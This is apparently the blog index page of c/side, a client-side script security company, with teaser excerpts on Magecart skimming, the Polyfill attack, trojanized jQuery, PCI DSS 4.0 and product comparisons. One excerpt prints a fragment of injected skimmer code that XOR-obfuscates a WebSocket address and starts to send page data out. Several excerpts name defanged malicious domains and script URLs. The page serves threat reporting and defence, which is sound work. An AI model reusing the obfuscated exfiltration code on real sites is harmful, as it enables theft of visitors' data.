Blog

Industry News, Insights and Resources

The latest industry news, interviews, technologies, and resources.

Featured blog posts

Threat feeds fail to detect attack for +2 years

On this website, we can see it’s been active since August of 2022. We've notified this, and other websites of this attack.

The Polyfill attack explained

Recently over 490,000 websites were targeted in a web supply chain attack. We were amongst the first to report on this. A few articles that mentioned us include: * Security Week * Bleeping Computer * Hackread * PCMag * The Register NOTE: If a website is referencing the domains polyfill[.]io, bootcdn[.]net, bootcss[.]com, staticfile[.]net, staticfile[.]org and unionadjs[.]com today, it is still open to this attack. What was the Polyfill service project? Polyfill was originally an op

Affiliate tracking and its cyber security risks

Malicious actors often exploit tracking pixels to inject harmful scripts on otherwise normal websites.

The cost of false positives - how we became a target

This week, we identified an intriguing use case involving the WP3[.]XYZ attack (link to our blog post). It sparked interest across the community and led to better detection rates on platforms like VirusTotal (VirusTotal link). While most appreciated our efforts, others criticized us for not identifying the root cause or recommending services to clean up hacked websites. Despite this, we aim to make the community aware of potential attacks and promise to do even better in the future. When fals

Over 5,000 WordPress sites caught in WP3[.]XYZ malware attack

We’ve uncovered a widespread malware campaign targeting WordPress websites, affecting over 5,000 sites globally. The malicious domain: "https://wp3.xyz/plugin[.]php".

Why Content Security Policy doesn't work

Content Security Policy (CSP) is a security feature provided by web browsers that a website owner can use to define a set of rules that control which resources (e.g., scripts, styles, images) can be loaded and executed by the browser. We call this the client-side, which is at the very end of the web supply chain. When properly configured, it helps prevent a wide range of attacks. But those first three words make all the difference. It can help prevent: Cross-Site Scripting (XSS): By restricti

Introducing the c/side sidebar

We were running out of space. With more custom views and new products coming our way, we needed to create a bigger playing field, so we're introducing a new dashboard layout. The c/side sidebar houses a new range of views and easier access to the features you need more regularly.

The differences in client-side security solutions

Client-side security is on the rise. With the growing need for 3rd-party scripts, the risks grow in parallel. Attackers no longer need to breach your server or backend, they exploit scripts loaded in your users’ browsers. Through these, they can steal sensitive data, compromise payments, and undermine trust. Businesses need to implement client-side solutions to mitigate these risks, but here’s the reality: not all client-side security solutions are created equal. Some vendors rely on outdated

Ad marketplaces security and compliance risks

For businesses monetizing through ad marketplace models, the less traditional 3rd-party advertising networks, analytics platforms, and marketing scripts are indispensable. They’re needed to drive revenue by boosting engagement and tracking user behavior.

New client-side attack only a proxy could stop

The malicious script behaves differently depending on how it is fetched. On infected websites, it transforms into an obfuscated data-exfiltration payload designed to evade detection.

A new Progressive Web App danger very few know about

With the rise in adoption of PWAs comes an increase in client-side security risks. And the industry? It’s barely talking about it.

Real-time view of script

We're now offering a live view of scripts passing through our proxy. With this view, it's easier to track live activity on your website.

Polyfill - More than just a redirect attack

When we and news outlets reported the Polyfill attack, the reactions were surprisingly mild. This may have been due to the visible result: a simple redirect to obscure websites. But, as we outlined in our post-mortem, the potential consequences are far more severe: “Here the bad actor opted to only redirect users to adult and betting websites, however much worse could have happened. Listening in on keystrokes in a small percentage of sessions based on geolocation and time of the day, injecting

New 3rd party JS script attack found: Artifyau[.]com and Quantifymy[.]com

This week, we deployed a specialized crawler for research purposes. Within just 24 hours, it successfully identified new Magecart attack patterns. Magecart is a sophisticated, financially motivated threat that injects malicious JavaScript to steal personal payment information. Here's a list of the biggest Magecart attacks thus far. Initial Detection: Obfuscated JavaScript on Artifyau[.]com Detected URL: https://artifyau[.]com/T1M0dVluVnBiR1J6YVhSbGNISnZMbU52YlE9PQ/jqwery.js. The URL mimics a

New Magecart attack code revealed

On October 14th, we posted an article on how another Magento Magecart attack was taking place. At the time, we only noticed one script as the culprit. Today, we were able to find and analyze the attack in more detail. The attack decoded This was the injected code: <script> const qbq = [93,89,89,16,5,5,77,89,94,75,94,70,73,4,69,88,77,5,64,67,92,69,21,89,69,95,88,73,79,23]; const zep = 42; window.sss = new WebSocket(String.fromCharCode(...qbq.map(hwo => hwo ^ zep)) + encodeURIComponent(location.h

How web extensions can hurt your site (INFIRC[.]com and INFIRD[.]com)

The domains infirc[.]com and infird[.]com have caused quite the stir recently, and highlighted the dangers of infected or malicious web extensions. Infirc[.]com was first observed coming into our backend appearing as the referer header, even though it is not hosted or referenced by our site. Our public domains directory indexed the domain right after, and our internal detection engine flagged it as potentially malicious. Go to this page in our directory. Infirc[.]com is a newly registered dom

The Internet Archive Hack: How JavaScript fits in the picture

The Internet Archive, known best for The Wayback Machine, experienced a security breach yesterday. This was not the first time it had been targeted. A mocking JavaScript popup appeared, stating: Have you ever felt like the Internet Archive runs on sticks and is constantly on the verge of suffering a catastrophic security breach? It just happened. See 31 million of you on HIBP! HIBP, short for Have I Been Pwned?, is a site where users can check if their personal information has been compromise

The biggest Magecart attacks in history (so far)

Where the term “Magecart” comes from Magecart attacks are a type of cyberattack where hackers inject malicious JavaScript code, often referred to as "skimming" scripts, into websites. This can be any type of website, but when talking Magecart, it’s almost exclusively e-commerce sites, with the aim of capturing credit card details. The term "Magecart" originates from the combination of "Magento," a popular open-source e-commerce platform, and "cart," referring to the shopping cart feature on these

New TTPs in Stealing PII and Financial Information from Magento Websites

At c/side, we actively monitor client-side supply chain attacks, with a focus on the evolving tactics, techniques, and procedures (TTPs) used by threat actors. One of the most common attacks we've observed over the past few months is the targeting of eCommerce websites built on the Magento framework. In particular, we've been closely following the Cosmic Sting attack (CVE-2024-34102), which has been widely reported, including by Sansec (https://sansec.io/research/cosmicsting). Recent TTP Obse

Why do websites need 3rd party scripts?

When developing a website, you’ll often include libraries to help speed up the development process, and avoid reinventing the wheel. However, there are times where you need to load a script from an external source. Due to recent attacks such as the Polyfill domain takeover, questions have been raised: why do you even need 3rd party scripts? How do they end up on a website? Firstly, let’s set the stage. 3rd party scripts are JavaScript files served from a server other than your own. For example,

c/side joins the PCI Security Standards Council as an Associate Participating Organization

We’re proud to announce that we've joined the Payment Card Industry Security Standards Council (PCI SSC) as an Associate Participating Organization. The PCI SSC leads a global, cross-industry effort to enhance payment security by establishing flexible, industry-driven data security standards. Through collaboration with other industry leaders, the Council’s mission is to protect payment data from emerging threats and meet the evolving needs of the payment ecosystem. As an Associate Participatin

Carlsberg a target in Magento “CosmicSting” malware attack

The term “Magecart” refers to attacks on the Magento platform. Recently, another large campaign was found to target Magento sites again. Among these, Carlsberg was one of the compromised websites. The pattern of these attacks is almost always the same. A single line of JavaScript loads content from a remote website. In other words, a 3rd party script. That code is then heavily obfuscated to delay detection even more. In this case, the payment process was quietly changed. A fake payment method

c/side joins the W3C

We’re incredibly proud to announce we have joined the W3C Web Application Security Working Group. The mission of the Web Application Security Working Group is to develop mechanisms and best practices to improve the security of web applications. Our whole team has been involved in cybersecurity for years. Through c/side, we now aim to raise awareness and set higher standards for client-side security. By joining forces, we are one step closer to achieving both of our goals. We want to publicly t

Kuwait ecommerce site is being used to facilitate client-side skimming attacks

A popular e-commerce site in Kuwait, running an outdated version of Magento (2.4), has been compromised by a malicious JavaScript injection, exposing customer payment data. The vulnerability, likely linked to the CosmicSting bug in Magento, has been patched, but sites not updated remain at risk. Unlike other impacted sites, Shrwaa[.]com is being exploited as infrastructure for additional attacks. A URL scan shows numerous sites referencing Shrwaa[.]com, which hosts multiple malicious JavaScript

Why do developers obfuscate JavaScript?

As a client-side security company protecting JavaScript, we see a lot of obfuscated scripts. When you use our tool, you can actually see the deobfuscated version of the scripts to see what it is doing. Deobfuscation has been around for a while, but why is code obfuscated in the first place? JavaScript obfuscation came around to protect the source code of web applications from being easily understood, copied, or exploited by unauthorized users. Obfuscation as a concept predates JavaScript and e

Human Security Client-side Defense vs c/side

This article takes an honest look at the features of Human Security Client-side Defense. Since you’re on the c/side website, we acknowledge our bias. That said, we’ve built our case honestly and based our analysis on publicly available information, industry information, and our own or our customers' experiences. If you want to verify their claims yourself, please navigate to their product page. Human Security started in the bots detection space, and are well known for creating very sophistica

What is Client-Side Security?

Client-side security covers all operations occurring on a user's device, such as a browser on a computer or other device when interacting with a web application. Attacks targeting the client-side aim to manipulate the user’s interaction with that web application to steal data or inject malicious code. Why secure the client-side? A lot of attention is already placed on securing the supply chain. NPM and similar registries are covered by a range of solutions, cloud security is an entire indus

ButterCMS unreported downtime and security concerns

ButterCMS is a popular tool used to manage content for blogs. Earlier this week, we noticed a potentially severe security incident which triggered the team to remove ButterCMS from our site, and start an in-depth investigation into what happened. Potentially 1,660 websites and over 5,800 domains were impacted. Our aim is to share the findings of our investigation to show what can happen when you trust dynamic 3rd parties without continuous verification. The ButterCMS incident We observed t

c/side raises a $6m seed round

We’re incredibly proud to announce our seed round of $6m, just six months after raising our pre-seed of $1.7m. The round was led by Uncork Capital, with participation from Mantis and PrimeSet. We also welcome back Scribble VC and Roar Ventures who supported us in the pre-seed. Together with this news, we’ve opened up our free tier to all. You can now sign up and start using c/side to monitor, secure, and optimize 3rd party scripts. We founded c/side to put client-side security on the map. For

Cisco client-side Magecart JavaScript attack

Another day, another high-profile client-side JavaScript attack. This morning, we read that Cisco is the next victim of malicious code being loaded through a third-party script. The Cisco Merchant website operates on the Magento Enterprise framework, which is widely used by eCommerce websites. Magento offers a robust and scalable platform, but like any system, it’s vulnerable to exploitation if security patches and updates aren’t applied in a timely manner. The exact version of Magento in use at the time o

c/side picked for TechCrunch Disrupt Startup Battlefield 2024

We’re incredibly proud to announce that we were selected for TechCrunch Disrupt Startup Battlefield in 2024. This year’s Startup Battlefield participants span artificial intelligence (AI), software as a service (SaaS), fintech, security, sustainability, space exploration and more. Out of thousands of startups, just 200 make the cut, and we are absolutely thrilled to be among this select group. We cannot wait to share our product with the world Oct. 28 - Wed, Oct. 30 at Moscone West in San Fra

Feroot vs c/side

This article takes an honest look at the features of Feroot. Since you’re on the c/side website, we acknowledge our bias. That said, we’ve built our case honestly and based our analysis on publicly available information, industry information, and our own or our customers' experiences. If you want to verify their claims yourself, please navigate to their product page. c/side Feroot Doesn't solely rely on CSP policies ✔️ ✔️ Doesn't cause console errors ✔️ Client side JS script de

How to speed up JavaScript

“Eliminate render-blocking resources”, “reduce unused JavaScript” and “minimize main thread work” are usually found right at the top of the PageSpeed Insights report. They talk about potential savings, but besides using the defer attribute, there isn’t much info on how to achieve them. There are, however, a few extra ways to get your pages loading faster by tackling JavaScript. Let’s get deferring out of the way first, and then give you some extra options. Defer or async? In short - deferring loading scripts ma

What are digital skimmers?

Recently, we read of a new significant cyberattack campaign that targeted hundreds of online stores, exploiting vulnerabilities in third-party scripts and plugins. This is a perfect example of a ‘digital skimmer’. Digital skimmers are snippets of code maliciously injected into legitimate websites. They target personal and credit card information. This problem is on the rise and is part of the reason c/side was created. Our proxy is able to detect this malicious code and prevent it from affect

Why browsers are becoming increasingly more dangerous

Technologies like WebAssembly (WASM), WebGPU, and IndexedDB have transformed what browsers can achieve. This evolution has expanded the functionality of browsers, massively evolving the use cases and experiences. However, this increased complexity also brings a significant cybersecurity concern: an enlarged attack surface. To understand where we are today, let’s take a trip down memory lane. Remember when you needed Flash Player to view rich multimedia content on websites? Adobe Flash was revo

The true cost of a cyber attack

Calculating the true cost of a cyber attack is difficult. None are the same, and companies respond differently. Yet it’s important to report on this in as much detail as possible to accurately represent the full picture of when this happens to your business. Suffering an attack usually comes with very large consequences. Taking preventative measures must be a priority for any company conducting business and having data online. Financial costs Probably the most obvious reason a company is c

Is Tuaw a scam in the making?

When we saw the new Fireship video yesterday, we were immediately reminded of the recent Polyfill attack. Our first article was picked up and referenced by most cybersecurity news outlets, and a week later we published our full post-mortem. When Fireship then reported on Tuaw, “The Unofficial Apple Weblog” a ton of people read back in the day, we thought it right to report on it as well. A quick recap before we get into the troubling stuff: Tuaw[.]com was acquired by AOL, but a few years late

Roll-back to a previous hash

In case scripts start misbehaving over time or you wish to pin to a static version of a script, you can now pin to a specific hash.

The Copay event-stream attack illustrates dependency risks

The JavaScript ecosystem experienced a significant shock with a sophisticated attack on Copay, a popular cryptocurrency wallet provider, in November 2018. Known as the event-stream attack, this incident highlighted the critical vulnerabilities associated with relying on third-party dependencies in software development. Copay is now known as Bitpay Wallet. Understanding the attack Event-stream, a popular npm package, was widely utilized by numerous projects for efficiently managing streams

The Segway cyber attack explained

In January 2022, the Segway web store suffered a web supply chain attack - also often referred to as a Magecart attack. In these types of attacks, malicious JavaScript code is added that loads from the client-side, known as third-party scripts. Many common tools are third-party scripts. Things like analytics, captchas and more. But this avenue can also be used for malicious reasons, as was the case here. In this attack on Segway, their store is set up on Magento. The attackers targeted vulnera

Don't deploy scripts site-wide

Third-party scripts are often deployed site-wide, typically injected in the head tags in web frameworks like Next.js via the ’_document.js’ file. This widespread implementation, while convenient for developers and often recommended by onboarding guides, means these scripts run across the entire site. This is simpler to implement, but it also introduces security risks and performance issues that are often overlooked. The recent Kaiser Permanente data leak shows the dangers of having poorly manag

Multi-Factor Authentication for everyone!

c/side now supports MFA natively for all plans. Our MFA supports authenticator apps as well as hardware tokens. Use your YubiKey or Apple Touch ID on c/side! Identity and access management shouldn't suck, so we invested the extra effort to make it work for you. You can see the active sessions of your account and log out previous sessions from our dashboard. We also notify you of new log-in attempts.

What is an attack vector and what are hidden ones

An attack vector in cyber security is the way an attacker takes advantage of security weaknesses. Some are more obscure than others. One that’s been our focus is third-party JavaScript. Since these scripts are installed by the website owner yet executed in the visitors' browsers, they're in a unique position. If something malicious occurs within these scripts, neither party is aware. The visitor is affected and the website owner becomes liable. We’ve seen this too many times, for example the

Web supply chain attack through trojanized jQuery on npm, GitHub and CDNs

Attacks have been found in trojanized jQuery on GitHub, npm and jsDelivr in a new web supply chain attack. Each package had a copy of jQuery with one small change: the ‘end’ function. This is part of the jQuery prototype, and was modified to include additional malicious code. In the malicious script, the attacker sends a non-blocking GET request using ‘$.ajax’ to other domains. The request URL includes a query parameter, which varies between different packages. As a result, whenever the end fun

How expired domains lead to cyber attacks

In 2018, British Airways was attacked through the exploitation of a third-party JavaScript package running on their site. The script was compromised and the attackers added lines of code that automatically copied all customer credit card and transaction details to a new domain: baways.com. This domain was cleverly purchased by the attackers a few days prior to the operation. c/side currently owns baways.com. If you visit the site, you'll find an explanation of the entire attack from beginning t

What is the browser supply chain?

c/side is a cyber security product that lives in the browser supply chain space. We and other vendors operating here, like to talk about that supply chain. But, what do we exactly mean by it? The browser supply chain is the combination of components and processes that come together to render web pages, execute scripts, and ensure smooth functionality. This supply chain includes everything from the initial request for a webpage to the final rendering of that page in a user's browser. As well as

More than 490k websites targeted in web supply chain attack

NOTE: we now have a more complete article on the Polyfill attack here. The cdn.polyfill.io domain is currently being used in a web supply chain attack. It used to host a service for adding JavaScript polyfills to websites, but is now inserting malicious code in scripts served to end-users. Among the +490k websites targeted, it was confirmed the domain was still active on Disney-owned streaming service Hulu, The Guardian, Intuit and many more. Immediate Action: Check your code for any use of t

Why you can trust c/side

Our product exists to address security risks caused by 3rd party scripts. However, since c/side deploys through a third-party script, you might rightfully wonder why you should trust us. Here’s why: Script security is our bread and butter. For lots of vendors, serving the script is just a part of their product. We put every care and attention to detail in how we proxy, store and process scripts. We work to cover the blind spots that others might have missed. Let’s talk about that process. Fi

The BrowseAloud Supply-Chain Attack: A Case Study in Cryptojacking

In February 2018, over 4,000 websites, including high-profile government bodies like the UK's Information Commissioner’s Office (ICO), fell victim to the BrowseAloud attack. This was not just another cybersecurity breach; it was a potent reminder of the hidden dangers of third-party scripts in our increasingly interconnected digital ecosystems. What Happened in the BrowseAloud Attack? A seemingly benign third-party service called BrowseAloud, which helps websites enhance accessibility by conv

Ticketmaster Data Breach Déjà Vu: What You Need to Know

Yesterday, on May 29, 2024, news broke of an alleged data breach involving Ticketmaster, a prominent ticket sales and distribution company. Ticketmaster has confirmed unauthorized activity within a third-party cloud database environment, claiming to have exposed the personal information of over 500 million customers. This breach includes sensitive data such as emails, phone numbers, addresses, and financial details. ShinyHunters, a notorious attacker, reposted the breach. According to reports,

Supply Chain Risk Doesn’t End At NPM

Supply Chain attacks are a top of mind problem today. The number of these attacks in the US increased by 115% between 2022 and 2023, according to Statista. Tools like Socket and Coana detect harmful code in registries like NPM. But the supply chain risk doesn’t end there. Some tools are 3rd party scripts that get fetched by the browser of the user. By only checking NPM (or another registry), you’re not protected from attacks through these scripts. These scripts, used for marketing tracking, ad

Kaiser Permanente Data Leak: A Case of Miscommunication and Inadequate Disclosure

On April 29th, healthcare giant Kaiser Permanente disclosed a data leak impacting 13.4 million current and former insurance members. The incident was rooted in improperly managed 3rd party scripts. The Incident Kaiser Permanente used tracking codes to monitor how its members navigated through its website and mobile applications. Some of these pages contained sensitive healthcare data, leading to the 3rd party scripts inadvertently transmitting information to third-party vendors they weren’t

Akamai Page Integrity Manager vs c/side

Akamai Page Integrity Manager vs c/side. Which is better? You’re on the c/side website, so we’re going to be a tad biased. Nevertheless, we’ll make our case. To further your research, here’s the Akamai Page Integrity Manager product page. First the differences in a table, below in more detail. The differences between Akamai Page Integrity Manager and c/side c/side Akamai Page Integrity Manager Client side JS script detection ✅ ✅ Uses threat feed intel ✅ ✅ Monitors Who-is re

The 2021 cdnjs Vulnerability in Detail

Verifying that your 3rd party script sources are reputable is important. But that alone may not be enough. That’s what the world learned in 2021, when a massive vulnerability in Cloudflare’s cdnjs was flagged. Here’s the rundown of what happened, and how. Cdnjs is one of the most commonly used JavaScript Content Delivery Networks (CDNs) of today. Over 12% of all websites on the internet inject at least one script through cdnjs. A researcher with the screen name ‘RyotaK’ shared a supply cha

Jscrambler Webpage Integrity vs c/side

This article takes an honest look at the features of Jscrambler Web Page Integrity, another company focussing on client-side security. Since you’re on the c/side website, we acknowledge our bias. That said, we’ve built our case honestly and based our analysis on publicly available information, industry information, and our own or our customers' experiences. If you want to verify these claims yourself, please navigate to their product page. Jscrambler’s detection approach focuses on identifyin

Imperva Client-side Protection vs c/side

This article takes an honest look at the features of Imperva Client-side Protection. Since you’re on the c/side website, we acknowledge our bias. That said, we’ve built our case honestly and based our analysis on publicly available information, industry information, and our own or our customers' experiences. If you want to verify their claims yourself, please navigate to their product page. c/side Imperva Client-side Protection Doesn't solely rely on CSP policies ✔️ ✔️ Doesn't cau

Threat Feeds In The AI Era

The idea behind threat feeds is valid. But we’d argue it’s past its prime at this point, and with where technology is today, there are better options. Threat feeds are (often) a list of community-sourced security information. When someone notices a vulnerability, they’ll manually put out a notice to the threat feed. It then gets picked up and featured in the feed, where security folk at their respective companies read it and check their own systems to see if they are prone to potential danger.

Cloudflare Page Shield vs c/side

This article takes an honest look at the features of Cloudflare Page Shield vs c/side. Since you’re on the c/side website, we acknowledge our bias. That said, we’ve built our case honestly and based our analysis on publicly available information, industry information, and our own or our customers' experiences. If you want to verify these claims yourself, please navigate to their product page. Unlike c/side, Cloudflare Page Shield does not act as part of the delivery flow of third-party script

The risk of only protecting your payment portals from 3rd party javascript attacks

PCI DSS 4.0 is here. By March 2025, it mandates that payment portals need to have a way to authorize each script on payment pages. Websites need to maintain an inventory of all scripts (on those payment portals at least) and ensure their integrity. You now need to detect and respond to unauthorized modifications on payment pages, including changes to HTTP headers and page contents. Organizations must check these configurations at least once every seven days or as determined by their risk analysi

PCI DSS 4.0 complete guide and steps

The Payment Card Industry Data Security Standard (PCI DSS) is a set of guidelines that ensures the safety of card transactions globally. Created by the PCI Security Standards Council, its goal is to protect against data theft and fraud in debit and credit card transactions. The latest version of the PCI standard, PCI DSS 4.0, changes the criteria while emphasizing ongoing security and introducing new compliance methods. It replaces the PCI DSS version 3.2.1 (May 2018) to strategically address e
